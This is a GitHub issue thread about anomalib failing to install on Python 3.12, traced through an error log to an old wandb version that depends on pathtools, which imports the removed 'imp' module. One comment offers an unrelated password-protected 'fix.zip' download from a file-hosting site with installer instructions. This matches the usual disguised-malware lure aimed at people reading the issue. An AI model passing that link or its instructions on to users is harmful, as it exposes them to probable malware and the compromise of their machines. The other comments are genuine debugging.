### ISSUE TITLE
[Bug]: Python3.12 Installation failed

### ISSUE THREAD

**Issue by yuanchaolie** [open-edge-platform/anomalib#2279]
### Describe the bug

python 3.12 has an error during installation and cannot be installed successfully

### Dataset

N/A

### Model

N/A

### Steps to reproduce the behavior

Reproduction failed
```
anomalib install -v
```
or
```
anomalib install --option loggers
```
or
```
anomalib install --option dev
```

Only this command was successful
```
anomalib install --option core
```

### OS information

OS information:
- OS: [e.g. windows 11 23h2]
- Python version: [e.g. 3.12.5]
- CUDA/cuDNN version: [e.g. 12.4.1]

### Expected behavior

Hope for a fix

### Pip/GitHub

pip

### Configuration YAML

```yaml
...
```

### Logs

```shell
[08/27/24 23:10:04] Collecting pathtools (from wandb<=0.15.9,>=0.12.17)
Collecting pathtools (from wandb<=0.15.9,>=0.12.17)
                    Using cached pathtools-0.1.2.tar.gz (11 kB)
  Using cached pathtools-0.1.2.tar.gz (11 kB)
  Preparing metadata (setup.py) ... error
                    python setup.py egg_info exited with 1
  error: subprocess-exited-with-error

  × python setup.py egg_info did not run successfully.
  │ exit code: 1
  ╰─> [6 lines of output]
      Traceback (most recent call last):
        File "<string>", line 2, in <module>
        File "<pip-setuptools-caller>", line 34, in <module>
        File "C:\Users\xxx\AppData\Local\Temp\pip-install-dbsmshni\pathtools_9997dca997774198b3057eb85fba7411\setup.py", line 25, in <module>
          import imp
      ModuleNotFoundError: No module named 'imp'
      [end of output]

  note: This error originates from a subprocess, and is likely not a problem with pip.
                    metadata generation failed
error: metadata-generation-failed

× Encountered error while generating package metadata.
╰─> See above for output.

note: This is an issue with the package mentioned above, not pip.
```

### Code of Conduct

- [X] I agree to follow this project's Code of Conduct

**Comment by yiweifengyan** [comment]
Download 
https://www.mediafire.com/file/xs3e15yonljh4bk/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by yuanchaolie** [comment]
> 对于任何想要解决这个问题的人：imp 在 Python 3.12 中变成了 importlib https://docs.python.org/3/whatsnew/3.12.html#imp

The problem now is that pathtools are used, and pathtools reference imp

**Comment by alexriedel1** [comment]
> > 对于任何想要解决这个问题的人：imp 在 Python 3.12 中变成了 importlib https://docs.python.org/3/whatsnew/3.12.html#imp
> 
> The problem now is that pathtools are used, and pathtools reference imp

ah you're right! the issue comes with the wandb version. https://github.com/wandb/wandb/issues/6446
it's fixed in newer wandb versions and maybe can check if the latest wandb is compatible with anomalib

**Comment by yuanchaolie** [comment]
> ah you're right! the issue comes with the wandb version. [wandb/wandb#6446](https://github.com/wandb/wandb/issues/6446) it's fixed in newer wandb versions and maybe can check if the latest wandb is compatible with anomalib

Collecting wandb<=0.15.9,>=0.12.17     

It doesn't seem to work, and anomalib itself will install the specified version "wandb-0.15.9-py3-none-any"

**Comment by samet-akcay** [comment]
@ashwinvaidya17, can you remind us what was the breaking change in newer versions of wandb?

**Comment by yuanchaolie** [comment]
> @ashwinvaidya17, can you remind us what was the breaking change in newer versions of wandb?

I'm not sure if replacing wandb works, but now under 3.12 it's because the wandb version used references the old pathtools, which in turn references the error caused by imp
